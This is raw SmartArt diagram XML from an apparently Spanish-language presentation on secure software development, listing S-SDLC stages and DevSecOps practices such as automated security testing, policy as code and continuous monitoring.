    <dgm:cxn modelId="{73F3C210-1A77-48C2-B407-C94CB6FFF437}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{38BA2B31-1339-4362-9D62-C66559E9DB25}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{7BB174BD-394F-4CC7-A7BB-C737C90DC90F}" type="presParOf" srcId="{524A6FA5-5A5E-45EE-9EBB-3311DF4B2B61}" destId="{1D46C4C4-A40E-4BDB-A53B-4F26EDBBFE49}"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dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>1. Desarrollo</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Preproducción</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Despliegue</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Producción</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4">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4"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4">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4">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a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>2. Preproducción</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dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>1. Desarrollo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Despliegue</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Producción</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4" custLinFactX="78823" custLinFactNeighborX="100000" custLinFactNeighborY="-2859">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4" custLinFactX="-100000" custLinFactNeighborX="-110037" custLinFactNeighborY="1650">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4">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4">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FB1E1-6EE7-4BFD-985A-DF43CDAFE9D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="7933316" cy="1001790"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Adquirir conocimientos y capacidad de aplicación práctica de esos, sobre el control de seguridad en desarrollo de software</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="29341" y="29341"/>
        <a:ext cx="6767656" cy="943108"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AC52CEB-894F-4FB8-A092-F699E7822924}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="664415" y="1183933"/>
          <a:ext cx="7933316" cy="1001790"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Conocimientos básicos de ciberseguridad</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="693756" y="1213274"/>
        <a:ext cx="6559055" cy="943108"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CC2FC0A-40CD-45AF-8A5B-922A54027D01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1318913" y="2367867"/>
          <a:ext cx="7933316" cy="1001790"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Ciclo de vida de desarrollo de software seguro, S-SDLC.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1348254" y="2397208"/>
        <a:ext cx="6568971" cy="943108"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8761679A-1F39-471B-AE94-1326C0B49FE3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1983329" y="3551800"/>
          <a:ext cx="7933316" cy="1001790"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="004C41"/>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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Seguridad aplicada a desarrollo, arquitectura y procedimientos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2012670" y="3581141"/>
        <a:ext cx="6559055" cy="943108"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{734B8186-12BB-4FB9-BA17-F2DE2107086B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7282152" y="767280"/>
          <a:ext cx="651163" cy="651163"/>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ES" sz="1800" kern="1200">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7428664" y="767280"/>
        <a:ext cx="358139" cy="490000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4AB657D8-98DC-4C36-AA87-554FEA157735}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7946567" y="1951213"/>
          <a:ext cx="651163" cy="651163"/>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ES" sz="1800" kern="1200">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8093079" y="1951213"/>
        <a:ext cx="358139" cy="490000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4B273DA3-886F-4839-AC80-101ECB02BA71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8601066" y="3135147"/>
          <a:ext cx="651163" cy="651163"/>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ES" sz="1800" kern="1200">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8747578" y="3135147"/>
        <a:ext cx="358139" cy="49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4579117" y="0"/>
          <a:ext cx="2548147"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3. Despliegue</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4964967" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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1. Desarrollo</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="385850" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2267718"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2.Preproducción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2653568" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6884375"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Producción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7270225" y="0"/>
        <a:ext cx="1776447" cy="7717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6875355" y="0"/>
          <a:ext cx="2548147"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Producción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7261205" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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1. Desarrollo</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="385850" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2267718"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2.Preproducción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2653568" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4571142"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Despliegue</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4956992" y="0"/>
        <a:ext cx="1776447" cy="771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0"/>
          <a:ext cx="2050498"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Análisis de requisitos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="388153" y="0"/>
        <a:ext cx="1278798" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1815848" y="0"/>
          <a:ext cx="2050498"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01698" y="0"/>
        <a:ext cx="1278798" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3693201" y="0"/>
          <a:ext cx="2050498"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079051" y="0"/>
        <a:ext cx="1278798" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5538649" y="0"/>
          <a:ext cx="2050498"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24499" y="0"/>
        <a:ext cx="1278798" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A04D16DD-ACB2-44B9-88F0-55F0C1B78AC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7384098" y="0"/>
          <a:ext cx="2050498"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69948" y="0"/>
        <a:ext cx="1278798" cy="771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Análisis de requisitos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="412403" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1815848" y="101983"/>
          <a:ext cx="2050498" cy="820199"/>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25948" y="101983"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3693201"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103301" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5538649"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48749" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A04D16DD-ACB2-44B9-88F0-55F0C1B78AC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7384098"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94198" y="122479"/>
        <a:ext cx="1230299" cy="8201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Análisis de requisitos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="412403" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1815848" y="101983"/>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25948" y="101983"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3693201" y="122479"/>
          <a:ext cx="2050498" cy="820199"/>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103301" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5538649"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48749" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A04D16DD-ACB2-44B9-88F0-55F0C1B78AC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7384098"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94198" y="122479"/>
        <a:ext cx="1230299" cy="8201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1. Análisis de requisitos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="412403" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1815848" y="101983"/>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25948" y="101983"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3693201"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103301" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5538649" y="122479"/>
          <a:ext cx="2050498" cy="820199"/>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48749" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A04D16DD-ACB2-44B9-88F0-55F0C1B78AC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7384098"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94198" y="122479"/>
        <a:ext cx="1230299" cy="820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Análisis de requisitos</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="412403" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1815848" y="101983"/>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25948" y="101983"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3693201"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103301" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5538649"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48749" y="122479"/>
        <a:ext cx="1230299" cy="820199"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A04D16DD-ACB2-44B9-88F0-55F0C1B78AC4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7384098" y="122479"/>
          <a:ext cx="2050498" cy="820199"/>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94198" y="122479"/>
        <a:ext cx="1230299" cy="8201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6964D-23E7-4998-8580-EB5D531AEA34}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="504618" y="385"/>
          <a:ext cx="2789958" cy="1673975"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="9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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Cultura de seguridad</a:t>
          </a:r>
        </a:p>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Fomentar una cultura de seguridad en toda la organización</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="504618" y="385"/>
        <a:ext cx="2789958" cy="1673975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EC3889C4-1234-47BF-A45B-0CE6F63EFA7E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3573573" y="385"/>
          <a:ext cx="2789958" cy="1673975"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="8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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Automatización de pruebas de seguridad</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="711200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="0" i="0" kern="1200" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Integrar pruebas de seguridad automatizadas en el proceso de desarrollo para detectar vulnerabilidades en el código.</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3573573" y="385"/>
        <a:ext cx="2789958" cy="1673975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29601497-DBA4-4463-BF53-107231430CDC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6642528" y="385"/>
          <a:ext cx="2789958" cy="1673975"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="7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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Políticas de seguridad como código</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="711200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" kern="1200">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Implementar políticas de seguridad como código para automatizar la aplicación de configuraciones seguras.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6642528" y="385"/>
        <a:ext cx="2789958" cy="1673975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6AFEBF97-AC73-49B1-834E-D736FCA3EF6C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2039096" y="1953356"/>
          <a:ext cx="2789958" cy="1673975"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="6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Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Monitorización continua y detección de amenazas</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="711200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="0" i="0" kern="1200" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Implementar sistemas de monitorización continua para detectar actividades sospechosas y amenazas en tiempo real.</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2039096" y="1953356"/>
        <a:ext cx="2789958" cy="1673975"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1D46C4C4-A40E-4BDB-A53B-4F26EDBBFE49}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5108050" y="1953356"/>
          <a:ext cx="2789958" cy="1673975"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="004C41">
            <a:alpha val="5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i="0" kern="1200" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Formación y pruebas de penetración</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="711200">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="es-ES" sz="1600" b="0" i="0" kern="1200" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Proporcionar formación en seguridad y realizar pruebas de penetración regulares para evaluar la seguridad de la aplicación</a:t>
          </a:r>
          <a:endParaRPr lang="es-ES" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5108050" y="1953356"/>
        <a:ext cx="2789958" cy="16739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4377" y="0"/>
          <a:ext cx="2548147"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Desarrollo</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="390227" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2258063"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Preproducción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2643913" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4591043"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Despliegue</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4976893" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{317AD316-92B0-40BA-9B89-C1C6520E3C16}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6884375"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Producción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7270225" y="0"/>
        <a:ext cx="1776447" cy="7717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267718" y="0"/>
          <a:ext cx="2548147"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Preproducción</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2653568" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A713992-09A4-4E44-835A-B75579AC4F13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0"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Desarrollo</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="385850" y="0"/>
        <a:ext cx="1776447" cy="771700"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC6BF901-816E-4F6E-AAC9-C2462EBE1B50}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4591043"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Despliegue</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
